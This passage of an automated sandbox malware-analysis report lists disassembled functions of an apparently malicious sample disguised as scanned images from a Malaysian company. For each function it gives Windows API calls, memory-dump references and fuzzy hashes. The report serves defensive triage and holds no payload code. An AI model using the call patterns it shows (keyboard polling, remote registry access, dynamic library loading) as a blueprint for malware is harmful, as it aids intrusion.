                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 93d955f7a3d73136b97b098c13139a9c9161d04414317fbd4230fe2903220cfa
                                                        • Instruction ID: 7cbc0ebabf77ca2b91e7ce042f84368e411c5474d4052ea39ea88425dca34a22
                                                        • Opcode Fuzzy Hash: 93d955f7a3d73136b97b098c13139a9c9161d04414317fbd4230fe2903220cfa
                                                        • Instruction Fuzzy Hash: 5D217F74504209ABDB20AF68DC05A9E77F8AF55721F304A29F9A1D72D0D771DC40CB50
                                                        Function 00A8710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00A8712B
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A8715D
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00A8716E
                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00A871A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 50ceabdc74ce4c24aede27e27593b4a3b69ec9d83724904611c21daef5f126fc
                                                        • Instruction ID: f51782577c634299ec8923742aa8bbbac46412512c61a3205cc4ca3ef7bef9fa
                                                        • Opcode Fuzzy Hash: 50ceabdc74ce4c24aede27e27593b4a3b69ec9d83724904611c21daef5f126fc
                                                        • Instruction Fuzzy Hash: B5218375608206ABDB20AF689C08B9EB7E8AF55724F300B19FDB1D72E0DB70D841CB51
                                                        Function 00A8AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A8AEBF
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A8AF13
                                                        • __swprintf.LIBCMT ref: 00A8AF2C
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00AAF910), ref: 00A8AF6A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: 138f5fde83503b7302e70ac29341e25c58f6ba492c3d6eeacbc569dcda66493a
                                                        • Instruction ID: a2acdc33f4e72f692e721e4d7e46ef8b759f5e3b1a2dc8a87e43dd1c2479049f
                                                        • Opcode Fuzzy Hash: 138f5fde83503b7302e70ac29341e25c58f6ba492c3d6eeacbc569dcda66493a
                                                        • Instruction Fuzzy Hash: 42214135A00109AFDB10EFA4DD85EAE7BB8FF89704B104069F909EB251DB31EE45CB61
                                                        Function 00A7A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                          • Part of subcall function 00A7A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A7A399
                                                          • Part of subcall function 00A7A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A7A3AC
                                                          • Part of subcall function 00A7A37C: GetCurrentThreadId.KERNEL32 ref: 00A7A3B3
                                                          • Part of subcall function 00A7A37C: AttachThreadInput.USER32(00000000), ref: 00A7A3BA
                                                        • GetFocus.USER32 ref: 00A7A554
                                                          • Part of subcall function 00A7A3C5: GetParent.USER32(?), ref: 00A7A3D3
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00A7A59D
                                                        • EnumChildWindows.USER32(?,00A7A615), ref: 00A7A5C5
                                                        • __swprintf.LIBCMT ref: 00A7A5DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                        • String ID: %s%d
                                                        • API String ID: 1941087503-1110647743
                                                        • Opcode ID: 7a5ce48d1e052ffb6d74c3d2aea49ab20f502a16aea50c5d7d9e184e10638e32
                                                        • Instruction ID: 92fbf6316b11a4bf984a9590f8c2d2071c76fa5067b2cfdd725b77c2205ac4ce
                                                        • Opcode Fuzzy Hash: 7a5ce48d1e052ffb6d74c3d2aea49ab20f502a16aea50c5d7d9e184e10638e32
                                                        • Instruction Fuzzy Hash: 9E11AF75200209BBDF14BFA4ED85FEE7778AF99710F04C075B90CAA192CB709A468B75
                                                        Function 00A82017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00A82048
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                        • API String ID: 3964851224-769500911
                                                        • Opcode ID: f713ae3ba85549372e98283d43acaf86946954478f68f74de990f6f9454d451c
                                                        • Instruction ID: 986384c29722d371a1e6707ee0fdad1739970644b9eb277d8e780e6ed4ec1c2d
                                                        • Opcode Fuzzy Hash: f713ae3ba85549372e98283d43acaf86946954478f68f74de990f6f9454d451c
                                                        • Instruction Fuzzy Hash: 3F113934D4011A8FCF00EFA4DA419BEB7B4BF66304F108569E856A7352EB326D0ADB50
                                                        Function 00A9EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A9EF1B
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A9EF4B
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00A9F07E
                                                        • CloseHandle.KERNEL32(?), ref: 00A9F0FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: dabcdb10dfbea801e65659115dbdae8d6162c35066be5ba5c9b6b90a201cac5e
                                                        • Instruction ID: 10bdd0c6ed18dd0a9b6786f061479b26f3b08f638dddf3f0398dc70dd0f9a946
                                                        • Opcode Fuzzy Hash: dabcdb10dfbea801e65659115dbdae8d6162c35066be5ba5c9b6b90a201cac5e
                                                        • Instruction Fuzzy Hash: 1F8172716043119FDB24DF28D946F2BB7E5AF48B20F14882DF599DB292DB70EC418B91
                                                        Function 00AA02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00AA10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AA0038,?,?), ref: 00AA10BC
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AA0388
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AA03C7
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AA040E
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00AA043A
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AA0447
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3440857362-0
                                                        • Opcode ID: c65b6a647b55f8aaeb84c599eceac8de5452d4379cf7a9050010866e195920e5
                                                        • Instruction ID: c380a113cfcb336499ce1983402923cd8baa534ad26be87b23e6323796db163a
                                                        • Opcode Fuzzy Hash: c65b6a647b55f8aaeb84c599eceac8de5452d4379cf7a9050010866e195920e5
                                                        • Instruction Fuzzy Hash: E7513A31208205AFDB04EF68D981E6FB7E8FF89704F04892DB5959B2A1DB31E905CB52
                                                        Function 00A9DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A9DC3B
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00A9DCBE
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A9DCDA
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00A9DD1B
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A9DD35
                                                          • Part of subcall function 00A25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A87B20,?,?,00000000), ref: 00A25B8C
                                                          • Part of subcall function 00A25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A87B20,?,?,00000000,?,?), ref: 00A25BB0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 327935632-0
                                                        • Opcode ID: 2bb22e97c0a9978b4b659b70fe739b39a658061ce7f0151780511d2422347997
                                                        • Instruction ID: 647980ca9ca072f81f23ddb5f6e78fc7042a89a806572ede0bbd8d9efc9da118
                                                        • Opcode Fuzzy Hash: 2bb22e97c0a9978b4b659b70fe739b39a658061ce7f0151780511d2422347997
                                                        • Instruction Fuzzy Hash: 43512735A00215DFDB00EFA8D5849AEB7F4FF59320B048069E919AB361DB31AD85CB90
                                                        Function 00A8E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A8E88A
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00A8E8B3
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A8E8F2
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A8E917
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A8E91F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: 086e16f1a7309424d34a852be3753cd989ddcfad1f3c039b5d2025f55b41911f
                                                        • Instruction ID: 8ae54a96a35d59d412a75474633d53dffb812de6025d78f943a477e9cd56dae8
                                                        • Opcode Fuzzy Hash: 086e16f1a7309424d34a852be3753cd989ddcfad1f3c039b5d2025f55b41911f
                                                        • Instruction Fuzzy Hash: 2B512B35A00215DFDB05EF68DA81AAEBBF5EF49310B1480A9E849AB361CB31ED51DB50
                                                        Function 00A22344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00A22357
                                                        • ScreenToClient.USER32(00AE67B0,?), ref: 00A22374
                                                        • GetAsyncKeyState.USER32(00000001), ref: 00A22399
                                                        • GetAsyncKeyState.USER32(00000002), ref: 00A223A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: c22c404842273ba8e34fcc4d3a9bf71bb6971c7e7599a3c9270fea744f5e8f0f
                                                        • Instruction ID: d41f025bd04c4a1b3288e3d3b7b62afcf226dd068ea763533439183e298fe02f
                                                        • Opcode Fuzzy Hash: c22c404842273ba8e34fcc4d3a9bf71bb6971c7e7599a3c9270fea744f5e8f0f
                                                        • Instruction Fuzzy Hash: 4D416F31504215FFDF15DFA8D844AEDBBB4FB05321F20432AF8249A290C7749954DBA1
                                                        Function 00A76920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A7695D
                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00A769A9
                                                        • TranslateMessage.USER32(?), ref: 00A769D2
                                                        • DispatchMessageW.USER32(?), ref: 00A769DC
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A769EB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                        • String ID:
                                                        • API String ID: 2108273632-0
                                                        • Opcode ID: 58e7cf4082162b0c0c351faa567a9bb3a9902ee635c75c1b3cb2cac619e552f0
                                                        • Instruction ID: 390b90a945bbb611b2e0831f35173295ee63667d176ab8d19fe7304aa5d0b57d
                                                        • Opcode Fuzzy Hash: 58e7cf4082162b0c0c351faa567a9bb3a9902ee635c75c1b3cb2cac619e552f0
                                                        • Instruction Fuzzy Hash: C831F831900A86AEDB20CFF4CC84FF67BBCAB12340F14C969E529C60A1D7349886D790
                                                        Function 00A78F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00A78F12
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00A78FBC
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00A78FC4
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00A78FD2
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00A78FDA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 8094d9367fbdbe5fda4caf13c021eaef8470e203badbdea194bb70d11c3e1634
                                                        • Instruction ID: 978a23faa551c58347beefb1328cb8f6c39934317c9339fa6db2a2232d789b23
                                                        • Opcode Fuzzy Hash: 8094d9367fbdbe5fda4caf13c021eaef8470e203badbdea194bb70d11c3e1634
                                                        • Instruction Fuzzy Hash: 0131CE7150021AEFDB14CFA8DD4CA9E7BB6EB05325F10C229F929EA1D0C7B49914DB91
                                                        Function 00AAB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AAB44C
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00AAB471
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AAB489
                                                        • GetSystemMetrics.USER32(00000004), ref: 00AAB4B2
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A91184,00000000), ref: 00AAB4D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MetricsSystem
                                                        • String ID:
                                                        • API String ID: 2294984445-0
                                                        • Opcode ID: 3c318766c06159de620515e7f2bf8b6ba6abbce6e88f9aad612dbabc101eb6ca
                                                        • Instruction ID: 8a5586c2b4e154912e49f4d00a4775b70f8bb20a9bb60308a0727ad6bcc85966
                                                        • Opcode Fuzzy Hash: 3c318766c06159de620515e7f2bf8b6ba6abbce6e88f9aad612dbabc101eb6ca
                                                        • Instruction Fuzzy Hash: 9F218671920266AFCB149F78DC44A6537A4FB0A760F144B39F926D71E3E7319811DBA0
                                                        Function 00A212F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A2134D
                                                        • SelectObject.GDI32(?,00000000), ref: 00A2135C
                                                        • BeginPath.GDI32(?), ref: 00A21373
                                                        • SelectObject.GDI32(?,00000000), ref: 00A2139C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 8f1ef9744c15f1f3996c60b82e34e402b2b5e5a0964dc661e3f02f0c52b13cd3
                                                        • Instruction ID: 12e2358f9e85ce103b8db4f8b7c86f7cf7798a6206fd03462956882915bdf820
                                                        • Opcode Fuzzy Hash: 8f1ef9744c15f1f3996c60b82e34e402b2b5e5a0964dc661e3f02f0c52b13cd3
                                                        • Instruction Fuzzy Hash: 75216D70800259EFDB11CFA9EC447AD7BB9FB203A2F148636F8109A1A0D3719896DB90
                                                        Function 00A7C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 3a341a5c95b39114a5b9c41ae7b9e9ecd1ed0e159c4469e2366746a59f3d9692
                                                        • Instruction ID: 51d83d9aeb4f98f898ae73b1870df140497b73ca7e059a859135c751270a8590
                                                        • Opcode Fuzzy Hash: 3a341a5c95b39114a5b9c41ae7b9e9ecd1ed0e159c4469e2366746a59f3d9692
